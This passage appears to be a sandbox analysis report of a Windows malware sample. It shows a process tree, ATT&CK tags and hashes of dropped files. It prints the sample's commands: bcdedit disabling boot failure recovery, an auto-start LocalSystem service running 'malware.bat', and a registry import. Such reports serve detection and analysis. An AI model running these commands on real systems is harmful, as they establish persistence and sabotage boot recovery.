- Modifies boot configuration data using bcdedit
PID:5872 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
PID:1904 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5600
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
PID:708 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5520
-
C:\Windows\system32\net.exenet start MiServicio2⤵PID:5684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵PID:1912
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:5844
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2336
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2444
-
C:\Windows\regedit.exe"regedit.exe" "C:\Users\Admin\Desktop\ExitComplete.reg"1⤵
- Runs .reg file with regedit
PID:5372
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1System Services
1Service Execution
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c9c4c494f8fba32d95ba2125f00586a3
SHA18a600205528aef7953144f1cf6f7a5115e3611de
SHA256a0ca609205813c307df9122c0c5b0967c5472755700f615b0033129cf7d6b35b
SHA5129d30cea6cfc259e97b0305f8b5cd19774044fb78feedfcef2014b2947f2e6a101273bc4ad30db9cc1724e62eb441266d7df376e28ac58693f128b9cce2c7d20d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5efccc7faf9d35f6829425651cf800edd
SHA10d7ada221f33b53d7d6a3671ffa9f3532694f1fe
SHA2561fc2038b3cc76c3889043ea19543733a2f20387f340a371ae2027460e9c3a090
SHA5120dbbd194c34f16a7355d93cdc47c646947e5d4671dc8931b364e1f42493c5b664a2d3b802663479eae3e26b17a4991f6600711593a54863d9b00d8e75552eafd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD54dc6fc5e708279a3310fe55d9c44743d
SHA1a42e8bdf9d1c25ef3e223d59f6b1d16b095f46d2
SHA256a1c5f48659d4b3af960971b3a0f433a95fee5bfafe5680a34110c68b342377d8
SHA5125874b2310187f242b852fa6dcded244cc860abb2be4f6f5a6a1db8322e12e1fef8f825edc0aae75adbb7284a2cd64730650d0643b1e2bb7ead9350e50e1d8c13
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0Filesize
44KB
MD5e874a18e144abad80f84b0ce0a850cda
SHA1c9fcf7a77a1d8d6e4aeded1f9dee73812aa4d7b6
SHA256d0fae510fa37af635b5025554c748cbbbc046f3b08644114f9f6037d1559fb4a
SHA5126f1dcbbd8474bc3cfdbc48cc7dbff0765449012071d0d5f3bd1079ffaf63375710ede72653a445f6a38a126b74e335936d622f613dcd47064e6a0df1a92ab9ef
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1Filesize
264KB
MD562f5153e0d2cd98c45f6b6ce74440d4a
SHA1a66c21d4c26efd2f2c2b2a8d52be3be883179122
SHA2569b4c402723307f8bdac940365678b3c7b674aad246c4df75f33828a5562d62ee
SHA512e0404578a7f6e97e119b530d9a4d947c34eace8f00f2def930ac4acedfcb1975efc76d443c68818d5a481b51da9dc4cfef2847476b29d27c01827635103837a3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3Filesize
4.0MB
MD5daee3b856479fc5b0545a2419faf9a3b
SHA1491f71026ef1c229c53fe1ac49b5b450b38f88de
SHA256e9dd423e8e8fd20eecc215368bc367c772fac546a886447844f75b4c30d3da76
SHA5128559237c349bda3304267b4df1fc932e9b1f42e033b51d4024ad3f356e560e7801dcc3d49ce930d1e192d6050196b576781e50c28d9d3f2c6f3b1e16fd8761ad
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
96B
MD5fdfa568e4c7e2dc9a376df28b80ffdac
SHA192ab016cc47dee1efe945ab2abc7f9dc88d52d2f
SHA2562a0ec4667ea752c7dd5433350330db80a17541a9cb2de5658f534ac2b86ebbf0
SHA512a1c43a9a87cc5d201b0fafaa7ca06294b8a54b37f882d66fd3d4ebaaba70e9e7f61e5044a39735aad5a37c6ea37fdf3f1635a885842545f434d2b542097ae0e0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
72B
MD5c84f921704a54366b00f87e147e96f17
SHA14d494f443e375ac012eb82ddaab1b58ff37f685e
SHA25645ffef33af9b503c91b32b33217ecd6126fd5d69a23965ad7e6d147f09dcb947
SHA5126a9be66b005fbf388cd953b100c4b72d5094e0c81ce914ed9878bafbef02a72a4989e2b03f4c3b4eac92b73c8b15bc04c2814674beab910620bf5dd316f4ec1d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\CookiesFilesize
20KB
MD532162557a2897e234bfd98f10e3ff2f7
SHA14824ed7180691a2ed71ec6cdcec72ba91b14644a
SHA256750c65316cc6caf34662d5a198a5c6b923a36f0f163828ae19f1711d6786101f
SHA512c5b1c8d4a3ee419db109598365347005805030cd0f87705b8646aedb07994d034eb3483ccf3acb444e4b524c0a64d8331861bbd827e3440df5eb3321ddf0c370
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOGFilesize
322B
MD5cd64e2723d14ba0fd84e38759c5252bc
SHA15a32fa68be97533eabcf8daeade3fdba473fa905
SHA25685d1678b2e4edf3f884dda99e7239bd35d4a70081239a91bcf1280c0f4490e05
SHA5127aaf6148b87d1c427b248e4372342686a05a36b13231e2c5e56ad75b7ee8f093dba1184e6337d919141ac6cb8d53b954244db2f38e9afd224e694464c23a0d1d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1Filesize
264KB
MD5982893abdf13b4ec8632c10a09d45172
SHA11ffba5041436e13caef028d298521247f1d69de4
SHA256253c89648ab906908d19069ad2978c64b8e3af5d7fe3dfa7dfb9f934f464e45f
SHA5129c7b5199ac28dcebc4707db88ab520db5c01bc17c8a4e648dd7d8b3d7ccd89c3808e9178ef8277461a206915a5404de6b15590588cf882f812a23e3c86805749
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HistoryFilesize
124KB
MD509a951e1041e79921081ffc272d75575
SHA11429b12822baae80d85f0598bbc56bf59decd25d
SHA25616b91877572be2da8a2c4be72217782122a6133cee58621081a7151c32105487
SHA5126521d9097976e8babc44bcc55b752a100ed7f4501ca47011f5585175ea816d12ac09825c4858ae52e70c6cd2f0045d7dc4705a3050e14416def0019e116e3496
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider CacheFilesize
804B
MD5325c81b304b78d7c2690ff789d59f4d3
SHA13ff6599574aebccd713aad7074be14e7e9dbc6b9
SHA2569d65fa6dfa2e7784c52ecab340cbe240afcec1d46306a27896ace7b962cfb416
SHA512796120efc9c20d15cd571b1aba321c0f17cf5c5f48140eca9fead75ff97dcc8652f2e9e1b1ccd0db8f4e2d678fea2bcf22d77991d07306198fb7933fbe739753
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journalFilesize
20KB
MD550cbdaf407afb94ca0facb2010893c9b
SHA130b31666e7a130829c32e3b3406fdeb616373ceb
SHA2567f4c482db59fa3b4511a004a2eb33c0e6cf3ae660943be5fa182bded4c2fca25
SHA512b1d83dca8abddd7ce03c790588929376b296f38cf8fa517855ea882418f9e7c0c38f629e5e19a1ca0b6cf88fcefbe6c219b1344e0958076ce61cdc66be6aed74
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOGFilesize
334B
MD55f3f634db7d25da1ed4cf98f1b62616a
SHA138a953ddc262f3bcdfafdeb9bfa56512afe327bc
SHA25662cf18feb1f690e0cd6495eeefaf0c6a3e86173c3e587ecfecc3a94964650cb1
SHA512e7c8464a50ade60bfa68c3c169492a88c01fe964ffe06fa723203a2d77115fd77448ea4cd1bf49e05443f45738036a4e23a113e675b0752dd5d9f7b3809bb3a5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Action PredictorFilesize
36KB
MD5cf4b0a74bdc68a111bd7ccbd8569daa5
SHA1e567e83b8db5476018dfed63802d0f60690c8139
SHA256f79fc9fca22eace1d33311f380f135b75b30baa639f2d819fa437580ef268b6d
SHA5124ffda967282821d319e22334cc4410eb8883b436654c2ffa65a7a75fdac296a349a672c734e8fed023b9b34d5f17d1af611f81d433108f898459b5ae412dac9f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD56805a029aa408017e0f75fcc43a0f427
SHA19d82b733293379d2aaf08d584f7b5d4277be1ee6
SHA2560b6fad0c6c668865cccd568dc09b385c3175152bf2f1f0f58076e170df5cdca3
SHA5124d70268ee9370d3d7cc3a997ee779f836d13d44498a30763548b9b6d9004e50d1fef8dafd66612983adf1c9ba132c827a3e085b64e7bc848dd522f3144b74501
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5e21124767d3ed09b0e8e5463807aa59c
SHA17b26599505aada13f2254520afe3741c1bb0c0de
SHA2560bed56ea7482ed14a95f3ebbd13b56d12f474bf4b96ba2a060753ce3da8a8c6e
SHA51213a1354bf4bc51de034049983130eb64946ecb46873613746cd934d0761ea79a27c2745b242b7dbeff768b225faa577aafc8aaa4a9905183fc8bb1d0596c6abe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5901a1076eefc08aaf4d12e1627c48376
SHA1fdf169cd35a3de9130a2cce003f1cf8a7759982b
SHA256a25b769e567037f6c2ba69ace18960dbd5bdec73696629779d121e9f34decd10
SHA512577e808ceca33600a331dbe9c41085118bb89315c5e09c2862dbecab116564778a0537749c49be797bd286d67ebf2fe81f15fdf1056d2a2c5eb8907ce787f910
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD568cb7abcfaaea97c5b7a003b11b2d054
SHA1e965aa9b0461f74a12d4897b8235ed2a2fffbc4e
SHA2562c1d44151befa0b33d4bf93a3f1f668976ed2089944ef61f6e486ed7606ecd89
SHA512280bfd712dd55913100e919bf396766a080c77c1d3f5b949bc78193c40d51574d69fbe7426473c69f2f261773583488c41ffc17ec44914e75e383f1c6446dc7b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5d89beb5ba662fee38c6d6a2cd333263b
SHA107e775c85610c6d5eb143afd731fd9ddaa94ce72
SHA256867cff30d3e96fff36e34b9dff42420a1a7223e0883776057076eba6b4125062
SHA512cd43e30a8d02fab05646f0dba67e7119c5c14b60763c96a627bf0956456040fc7f4139c482aa1ea679ac4bf6665332924db960deeaa7565405aaa8216162d2f2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
7KB
MD51d53d7b50e841274c637a20a544b1358
SHA10d9e83dccd8d784f9214e01b5d2e6b55ad6c6443
SHA2560f3d8ed8b903fd484ddddb9c91344b2b88c51be80137ba5e11065fbd04b804a2
SHA51236ae7c18634464dffb9f575875d1a8b49518bc5867260a60254fc47395a7e8a279c54cb3786af96012b6f2d5ab2e73ef3887384451c13c74dd721c99be54c5fa
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
7KB
MD54acec5149eb5c76bd01ac0ca754d9cbc
SHA1ce55416f50caf2c1140dfb8d95ad1ee41239156a
SHA256f707ac4907ca2f2c413984e39c44699a6252a2cc851f20ca0e57bf3761c534ec
SHA512520ece2659965e28de095ed1864adf51ef4d7d3f048f494cd1a61ad96c367573a2a8326443f0d237f86a844ca3cd1ee93bf9491ce3954edff3d6939eb6804505
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferredAppsFilesize
33B
MD52b432fef211c69c745aca86de4f8e4ab
SHA14b92da8d4c0188cf2409500adcd2200444a82fcc
SHA25642b55d126d1e640b1ed7a6bdcb9a46c81df461fa7e131f4f8c7108c2c61c14de
SHA512948502de4dc89a7e9d2e1660451fcd0f44fd3816072924a44f145d821d0363233cc92a377dba3a0a9f849e3c17b1893070025c369c8120083a622d025fe1eacf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.logFilesize
213B
MD5046cc08d163fc4578cd1b77a5d0965ac
SHA192f503e605c30974baf385f1619f1269b81dec57
SHA256693a60684aa9ff4f01cb6027e9c938f4701c0c898afc224a0776cb1e18e87166
SHA512e8b1df36a237bcbbad897146ca247edf75466b2a4030fec620c46932b5c31137f2931cd2758534e4308aed3fb9cc40edf2d7646a38530bcc5e6d7069c19a3b1f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOGFilesize
322B
MD56cfe76389492616226eec1ef5c93f670
SHA1779b1cb38c67716b53c1bbb7b8675bc4d1a2c401
SHA256d09da5c5319c5309924a46527f9b7ad0ac57909d68a41c04a4faa9b534faf76a
SHA51270903102111e451961d2b76223dc7c57f728b1e5dbbb9268434496c91baf498b144b6a22b746cabf6666cd35f837db9f7f0114ad0389f0da5182d52165d32ae4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13360607723244648Filesize
2KB
MD50985a86600accfef7bca94b2c1a1f307
SHA11e2939703ff89d4c601b790630b8b06a18d8eb69
SHA2561da516e0c9380326af14db143133a2d13e01b64cd937c0fa5b9ee2fb0c60b0d0
SHA51279879ca965ef0717707a5283d6c2cb86cffb759f1d1884ee11af538ec441ef9d82b3bb89577b8b4fb6dc9e4bd05103c3b2f829496643b3012145e567ed742e3b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13360607723415648Filesize
2KB
MD5524af9e1a1b4eded0bda6a5f55e985e3
SHA178c58cb66bb281ff99814d50b1c7d68318c43338
SHA256b00f29b8645456cfae5206b26cce0d28421da3eb7b17f4697c6c33785e73181f
SHA512bd1cee86e200bd402ea18e24d84b7ef3a21a91f7cd0b101202859cf5ce74eba0e445513548deb8919bf5e5bfb6d56d492e2574647cb83195698d844592609266
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ShortcutsFilesize
20KB
MD5fca621466ede4c2499ecb9f3728e63ab
SHA13d5d4cd0fa702371f9d1a40e72e1fe19d194a3c4
SHA256c6dde84fb40fb69d1a6637fe6bf781de51a4c24e45b616e8f97afd3c6fe200b8
SHA512aa12ed8c1ff85af4375ac80d7fe494d6f8a70ddb3357c186a0c1ade9bbcc3efc3de5fb0ad4b81eb2ab9bc916b6adf8b76c30203f78e38cd00af5fa4ccf3e3760
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.logFilesize
112B
MD5932788bec7161a164875f2c4983cc7be
SHA1ecd075074470615b3c22da7b5278ce3817e70dff
SHA25691f6cd2309f3d03698be878a0aa4e4cb41ace0e191830bd877fb1f1f9c6a7757
SHA512937fde7edec478460ecf814ee7597fe2c16833087197625a81b89013b5dc6d05bd9f5643a8f5aa0ca9c69f4b4755e4537f2127aad1a63c09542658f1bde72fd5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOGFilesize
347B
MD5541c6a6386686313f08cdfc27912155a
SHA13feff2bafbc294317bae64560537d40101f42e30
SHA2561168416c77a25e7d5895a2ce0cf97ecff02ad5014231eb74b80550b0da646762
SHA512c508662846587edeacc2d9ffc4628febe6e52358699a614659136599ba814f49ec3d291b46e4c96a0551335709bdf153c66ba6d20002fda205620e8811fced33
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOGFilesize
323B
MD5b23fd064cf85c9c564ada42515433c8c
SHA13268faba94f2fe480a76f262bfcac3ee24f0820a
SHA25658a7cd876754bc92d9e17f0707bb0e3d1ef95ef0d30660fc6f9b840478bbc906
SHA51203b870590d55ed88746e7ce8e7e831efcdd63108545fe5228491fded20f80421e26b528365c14a1dec8855f1cbe8644fba1e7c5df0ad3a354eea0efd8bc6ec52
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited LinksFilesize
128KB
MD512b09d513c3553b426409a7d35ea6e4d
SHA11cd1f7f404ab150a6474647e0a623d7dc187bc42
SHA25694cabeb5424f36c8784a85d6634cf85decffe1b6fb3afa9ba55652d2294d9403
SHA5123ccb2d8e12c698a3d751c3cb0c04fed470d1abfcafe6269f3f4ecac73eb91b374588747055b57ae3152bc4cf91749fbf5638b3d2dacf84eba9b4209a1c89eccb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOGFilesize
198B
MD5281c4a05c6fc550f6966c77f420d642a
SHA1e4d5aeb78cba26a2cc7333017f0e626a86ce28ed
SHA256d8a49db3a6bdb38d97e3b83dcb487b5ff4fb7ed155965a871e2de6cf3341a1f6
SHA5122cb21293fc60a2d7f67b9d2782bd67f712351e57593f0124e597016c79ba4e6ad97aff86868ef0dbde5006d60cac2a623cc2b0fcb60dca95f5e31c35ef0e08bd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002Filesize
50B
MD522bf0e81636b1b45051b138f48b3d148
SHA156755d203579ab356e5620ce7e85519ad69d614a
SHA256e292f241daafc3df90f3e2d339c61c6e2787a0d0739aac764e1ea9bb8544ee97
SHA512a4cf1f5c74e0df85dda8750be9070e24e19b8be15c6f22f0c234ef8423ef9ca3db22ba9ef777d64c33e8fd49fada6fcca26c1a14ba18e8472370533a1c65d8d0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.dbFilesize
16KB
MD59e02552124890dc7e040ce55841d75a4
SHA1f4179e9e3c00378fa4ad61c94527602c70aa0ad9
SHA2567b6e4ce73ddd8b5e7a7c4a94374ac2815d0048a5296879d7659a92ee0b425c77
SHA5123e10237b1bff73f3bb031f108b8de18f1b3c3396d63dfee8eb2401ce650392b9417143a9ef5234831d8386fc12e232b583dd45eada3f2828b3a0a818123dd5cd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.dbFilesize
44KB
MD5ccca2994b90655bf2ee1bd25fca169a4
SHA1ca9c47746d132ed938774d32ec6b41ec8a92dc6f
SHA256968d1343c07de4330c9ade0ceed37cd1358ae3b70389e3af1661ecef49708e46
SHA5125f48dc04ba45d71755caf16e488ac1bada4559e80ad60eb6fd14e472a5e8578e10bf257fbb1736e5ffa6e5017d20c530a398e79034fd4feeb5b012dfca66b15d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.logFilesize
187B
MD5554a6e7c521b6a2b4d5591e3d0b4144e
SHA18677036506f69e43c850424d36ee1c946c392455
SHA25614dd0165b47130ab0ca1aedae5b7bb6756868929c1956925107006290c0aaef5
SHA512dc0140ff62da5471867e82a4c627a00618f9755b4417de18bcf64c3b18d3e20abefab2d5a04d18f67a55083221b0d1c8198dd82fbb7691ce491dfc1feb849ebb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOGFilesize
322B
MD5e09b50cb1e647da2d7b07ef5911d4302
SHA12d8c5bcfe945edb2903f599d92ac695989014fe1
SHA2565e5c2ea2adc3d97a374d7c7ec6f14daf8975814e2ab355eefd029256e771b282
SHA5121332308aa359f217ebdc9e3948fd28f64e647922989f4f99e7c0ba2fe1e29c916281e24994779ce953dc05907a03eb58b89a092ffa59ec27193af1d91763d112
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.logFilesize
594B
MD5e8dca28673e03790be4e9dd4bc78349e
SHA101052ea3656eed306a447f5f33e9262e6be6cfac
SHA256d2fabf0423a1afee07464615d4e7b400dd23fe04b8bb52639e53c3ae57ffda10
SHA5120e7952e12375cba5b7a8e3abf4a879076aca20c9af25e930148b6f611db696fb4003b3d48d5de07b1972685c109c094d39d46ef8442d58ae1177e56285f492da
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOGFilesize
340B
MD5ca78ff1e381341c74670b20495bf057d
SHA175d329f23db5bb7c95222fd5578fcb075d87dbb2
SHA25614b4fcb4d91e7055d09914cc3bf37f3a48f29e8695f91a1ac8cfd7dd2403b924
SHA5123f29a2266da632bd1bbf322e5ec1a7d745e3f1182b3b053b770765050cdfe59b08e8f8b11addff236a13d5bbb8c6f77343f1c1abc39f76db518b34d749374a16
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0Filesize
44KB
MD55a0ab3734ecf3f60527848356e4ed5c8
SHA192997031cb781d6cc8328369674947b7ea0c05d3
SHA256bc6a6690bce150bafeeea150d293b3f112fa8c8106040a0d388aa8d4c6f8ba7f
SHA512a0fad4f27b16f3d61b9d9f78491f743275ed1ec17f0c2e872bccfec0fb144255943269ba22546269575832c56385f65d663bc020a4c444acdcc601748dccde7e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1Filesize
264KB
MD50f763835dc54e95472101be940b66bfb
SHA1a8708da39d976c369a0b4f1d9b44d98853e2ab1e
SHA2562cc3a528a09b336ddad629217d7130d222a5f4386554ee6e96636fb6e2ec0a7d
SHA512ed0430bc43da8deb3ddbf8633f5ccda45e493667ca03be506b1b19bc584583b9e0dc24ab5c96b4e89bf4906bffadff77df9a96dc48e9e79575d3fc56ba0abaea
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3Filesize
4.0MB
MD520a0586e63839e4314261ca1b9039f2e
SHA1b39d8fdad6c761ac7ae3c6edd6cfd6c5bb2674ea
SHA2569fa3b14d1df07cd2198821d9efc9fb169f2818f3971d841d130488adfe455e75
SHA512243d699f6a64a2ebc9b5e924188364e27abfc3623c02ca214bc2775d12283e9704b669d600039e35cb09ac0f5d3da8ec264e8d5e8ac8b2c3e7d74215f83d04b7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last VersionFilesize
11B
MD5838a7b32aefb618130392bc7d006aa2e
SHA15159e0f18c9e68f0e75e2239875aa994847b8290
SHA256ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA5129e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5e07f54e4a57316ba329f39ed36ce6cfb
SHA1f568aa71db240dae23b5607b6fbb42c1d36784ad
SHA256439142c683d163addad7f33f7976851b431a6e492335c0fea21a8bab58229f06
SHA51281a44e08244a167f0e53448678eb2cc132e7bdbd5e8ff7735c656b92babdd4e35f7fb4d85d957221071931c903a17e85e7877f7a755c9b98a12e4fd618739e18
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD59151c7bc04c89b85c26b6507ebaa3e80
SHA14f353f60aa3fd6fea8402d516200125a3a5e00bc
SHA256fb7679d880b9e783ec3a5888f2acda186c4ec6c68938fd777bc757524958e14b
SHA5121ef2803677617a33ea932e43b726658c455b769dc4223fee932c4729243e3f121235e8d403798c438f64912925bec305e55e3ae1cf0b9d997fe3fb1ba81cc3c6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1Filesize
264KB
MD507cfa33bb6443dc294d155e8654ba58d
SHA1554cf31c71a3812d9311511ef5036ee13ec49d2e
SHA2569bc4994307fd399a63872ce4aec3baccb1db81514e6ab9aec2f54832704bbab4
SHA512b7ea1eac2ee7ba8c20d87ee29d540bb0d7bb84a58f9b2b9605e0daeff6610329f11f1fcac5f76b9b9e2c5c2b827aeea04d6c2497a5dee2c73612b05e3e716b6f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txtFilesize
4B
MD5274583a65fe6b9b9874eb891eb0acf17
SHA119c068ea4adbdf7bfe8729c603dcf8ba9249dac5
SHA256817f4787ab03c4377decd864c064ec156a0b3f5dffdc70795908d37a81a556bb
SHA512249d4ec5e10f0d61965d6ec6da27c0e620b362cae669f92fb203a06e4c0613dc57ce9c623fd4a19deb83cd0a9e5c6b2c7c10b33dd4f8c7e519db5fcca9758286
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\fe88f101-2b76-4dce-9d39-d73c8f4ea499.tmpFilesize
11KB
MD5d26e30ee3d815d90e6adad4ae04398fc
SHA1a55710c35b820eac0642f6f96f143b75e7894689
SHA25680df4ac0cff475e7ee3fba92440e23f4259b94cef36747b2ff8d47be6ebccdcb
SHA512abb50ff93d4449bda7906e5dfa2d1ee7cee14559318f54898df52f32b856ad3146f42c06d631e096495e32ff099825f0658f05428be7471ce6d5b92fb15b4605
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbresFilesize
4KB
MD5f6ee8af82761e872d702c57668e24162
SHA18535700d25715fc0c44186def44dee7528599b65
SHA256195767e2274244bd4bd619c5fdc71975c7418bc123d3f23471cf9e35a731d370
SHA51210bf2b2747cf909e9ea7bfb856864e8cef5945ccdb703b36083ac53f9b25c49b51b0e0486dd6d32d9271fa82986360ca18aaf27361dc5d27b69dad7bb8e72eb8
-
C:\Users\Admin\AppData\Local\Temp\disable_winload.regFilesize
91B
MD547b5ae368c4aff20eafa90ffdcd03a34
SHA1dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81
SHA256aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07
SHA512c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.dbFilesize
1024KB
MD5b0bcb925d85cd65cc926570d3dfed96e
SHA123c123a744528fbd7325a597ebbc7c75e6ea853d
SHA256cb215908a1c883d3cfb7ed6157d42af6da3a8fcf5993f3f3d582c5f7ec683d23
SHA512a0037f1ef86a4c2eeef6b19de16d6d71eff35aaff9daedfbc7f8227305d8acc8d36e119c590ef1ca6d3a25e2bbb0b6e91202ec93c1b22e7b961e00e839d8ba94
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
7KB
MD5a1dfdeb0848c46179d0d882ffe23d376
SHA18d52d9199d3bd2b12ba714fcf978eb7e44e46d07
SHA256aeeeb2061f29f4e7633b58063d231debddb3110fde08ecf97bc25b76dcf491b0
SHA512aba22cbaeb799cfea34c3a0a9c4a5d6822e40622f52df061097b5e77cc5cb329f75b8c7ae654b8f0944f4fbf2ba2d63f6352693fafb9cd11bb1df3fb249a62aa
-
\??\pipe\LOCAL\crashpad_4988_TIQWTLYHSJVDGSMXMD5
d41d8cd98f00b204e9800998ecf8427e
